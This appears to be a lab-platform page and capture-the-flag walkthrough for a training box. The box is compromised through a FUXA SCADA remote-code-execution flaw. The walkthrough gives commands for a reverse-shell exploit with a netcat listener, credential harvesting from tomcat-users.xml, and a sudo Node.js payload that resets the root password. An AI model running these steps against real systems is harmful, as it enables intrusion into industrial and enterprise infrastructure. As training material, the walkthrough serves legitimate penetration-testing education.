Avatar

Labs / Compromised 2

  • Hard
  • Released 01 Jan 2025

🏭 Can you compromise this multi-layered enterprise infrastructure?

A sophisticated enterprise environment runs multiple critical services including SCADA systems, web applications, and mobile components. With proper reconnaissance and exploitation techniques, even the most complex infrastructures can be systematically compromised. 🎯 Time to demonstrate advanced penetration testing skills across multiple attack vectors!

2
Flags
60
Points
Hard
Solution Available
Pro Exclusive
Start Lab Environment
~1-2 min setup
AWS dedicated
Private instance
Industry standard
Hard

🏭 Compromised 2 - Complete Multi-Vector Enterprise Compromise Solution

Objective: Perform advanced reconnaissance, exploit multiple vulnerabilities across different services, and achieve complete system compromise through a sophisticated attack chain involving SCADA systems, web applications, and privilege escalation.
🔍 Step 1: Advanced Network Reconnaissance

Begin with comprehensive port scanning to identify all running services:

# Comprehensive port scan
nmap -Pn -sC -sV -p-

# Expected services:
# 22/tcp - SSH
# 80/tcp - Apache HTTP Server
# 1881/tcp - FUXA SCADA system
# 4444/tcp - Closed (outbound traffic only)
# 8080/tcp - Apache Tomcat

The Apache HTTP server runs on port 80, which is the answer to the first question.

🔍 Step 2: Web Directory Enumeration

Use advanced directory enumeration tools to discover hidden paths:

# Using dirsearch (popular tool by @maurosoria and @shelld3v)
dirsearch -u http://

# Alternative tools:
gobuster dir -u http:// -w /usr/share/wordlists/dirb/common.txt
ffuf -w /usr/share/wordlists/dirb/common.txt -u http:///FUZZ

Dirsearch is the popular directory enumeration tool developed by @maurosoria and @shelld3v.

🔍 Step 3: Android APK Discovery and Analysis

Through directory enumeration, discover the backup directory containing an Android APK file:

# Access the backup directory
curl http:///backup/

# Download the APK file
wget http:///backup/MyFuxa.apk

Analyze the APK using jadx-gui, the popular Android decompilation tool:

# Decompile APK with jadx-gui
jadx-gui MyFuxa.apk

# Alternative command-line usage
jadx -d output_directory MyFuxa.apk

# In jadx-gui:
# 1. Load the APK file
# 2. Navigate through the source code
# 3. Look for API endpoints like /api/runscript
# 4. Find XOR-encrypted credentials for HTTP Basic Authentication

Jadx-gui is the popular GUI tool for decompiling Android applications that starts with 'J' and ends with 'X'.

🔍 Step 4: Credential Decryption with CyberChef

Use CyberChef to decrypt the XOR-encrypted credentials found in the Android app:

# Steps in CyberChef:
# 1. Select "From Hex" operation
# 2. Use "XOR" function with the key found in the app ("send")
# 3. The output reveals plaintext credentials: webadmin:supersecurepassword

# XOR is commonly used in encryption to obfuscate data by toggling bits
# It's a reversible bitwise operation: A XOR B XOR B = A

CyberChef is the web-based tool used for decrypting the XOR-encrypted credentials, and XOR is the bitwise operation used for encryption.

🔍 Step 5: SCADA System Identification

Identify the FUXA system running on port 1881:

# Access FUXA web interface
curl http://:1881

# FUXA is an open-source tool for creating web-based SCADA, HMI, and dashboards
# Developed by the Frangoteam

FUXA is the open-source tool used for creating web-based SCADA, HMI, and dashboards, developed by Frangoteam.

🔍 Step 6: CVE Research and Vulnerability Identification

Research FUXA vulnerabilities to identify the critical RCE vulnerability:

# Research FUXA CVEs
# CVE-2023-33831 - Unauthenticated RCE in FUXA
# Affects the /api/runscript endpoint
# Allows remote code execution through script injection

CVE-2023-33831 is the identifier for the critical RCE vulnerability affecting FUXA.

🔍 Step 7: Authentication Requirements Analysis

The FUXA RCE exploit requires authentication bypass. Analyze the authentication mechanism:

# The exploit needs to be updated with Basic Authentication
# FUXA may implement HTTP Basic Auth for API endpoints
# Credentials need to be discovered through other means

Basic Authentication is the type of authentication the FUXA RCE exploit needs to be updated with.

🔍 Step 8: Tomcat Configuration Analysis

Analyze Apache Tomcat configuration to find authentication credentials:

# Access Tomcat manager (if accessible)
curl http://:8080/manager/

# The tomcat-users.xml file configures users and roles
# This file contains authentication credentials for Tomcat

tomcat-users.xml is the file used to configure users and roles in Apache Tomcat.

🔍 Step 9: FUXA Exploit Modification and Execution

Modify the FUXA RCE exploit to include HTTP Basic Authentication with the decrypted credentials:

# Download and modify the FUXA exploit to include Basic Auth
# Key modifications:
# - Import requests and HTTPBasicAuth
# - Add authentication to the POST request
# - Use the decrypted credentials: webadmin:supersecurepassword

# Execute the modified exploit
python3 exploit.py --rhost --rport 1881 --lhost --lport 4444 --username webadmin --password supersecurepassword

# Set up reverse shell listener
nc -nvlp 4444

The exploit uses HTTPBasicAuth for authentication and targets the /api/runscript endpoint for RCE.

🔍 Step 10: Tomcat Credential Discovery

After gaining shell access as www-data, extract additional credentials from Tomcat configuration:

# Access Tomcat configuration directory
cat /usr/local/tomcat/conf/tomcat-users.xml

# This reveals higher-privilege credentials:
# Username: hackerpro
# Password: P@ssw0rd_12334445555

The tomcat-users.xml file contains credentials for the hackerpro user with broader system permissions.

🔍 Step 11: SSH Access and User Flag

Use the discovered credentials to SSH into the system as hackerpro:

# SSH into the hackerpro account
ssh hackerpro@
# Password: P@ssw0rd_12334445555

# Navigate to home directory and find user flag
ls -la /home/
find /home -name "flag-user.txt" 2>/dev/null
cat /home/hackerpro/flag-user.txt

The user flag is located in the /home directory as indicated by the hint.

🔍 Step 12: Privilege Escalation via Path Hijacking

Exploit privilege escalation through malicious JavaScript execution:

# Create malicious JavaScript file (from www-data reverse shell)
echo "require('child_process').exec('echo root:root | chpasswd');" > /var/www/html/betawebsite/FUXAendpoints/server/exploit.js

# Execute the malicious script as root using sudo
sudo /usr/local/bin/node /var/www/html/betawebsite/FUXAendpoints/server/exploit.js

# Gain root shell with changed password
su root
# Password: root

This technique uses sudo privileges to execute Node.js scripts that change the root password for privilege escalation.

🔍 Step 13: Root Flag Retrieval

With root access, retrieve the final flag:

# Find and read the root flag
find / -name "flag-root.txt" 2>/dev/null
cat /root/flag-root.txt
🔍 Step 14: Attack Chain Summary

The complete attack chain involves:

  1. Reconnaissance: Port scanning with nmap -Pn to identify services (Apache on 80)
  2. Enumeration: Directory enumeration using dirsearch to find /backup
  3. APK Analysis: Decompiling Android APK with jadx-gui
  4. Credential Decryption: Using CyberChef to XOR decrypt credentials
  5. SCADA Identification: Discovering FUXA system on port 1881
  6. Vulnerability Research: Identifying CVE-2023-33831 RCE
  7. Exploit Modification: Adding HTTPBasicAuth to FUXA exploit
  8. Initial Compromise: RCE through /api/runscript endpoint
  9. Credential Harvesting: Extracting hackerpro credentials from tomcat-users.xml
  10. Lateral Movement: SSH access as hackerpro user
  11. User Flag: Retrieving flag from /home directory
  12. Privilege Escalation: JavaScript execution via sudo Node.js
  13. Root Compromise: Password change and root shell access
Flags Location: User flag is located in /home directory, root flag requires privilege escalation through discovered sudo privileges.
Real-World Application: This challenge demonstrates a realistic enterprise compromise involving multiple technologies commonly found in industrial environments. The attack chain shows how attackers combine web application vulnerabilities, SCADA system exploits, and configuration weaknesses to achieve complete system compromise.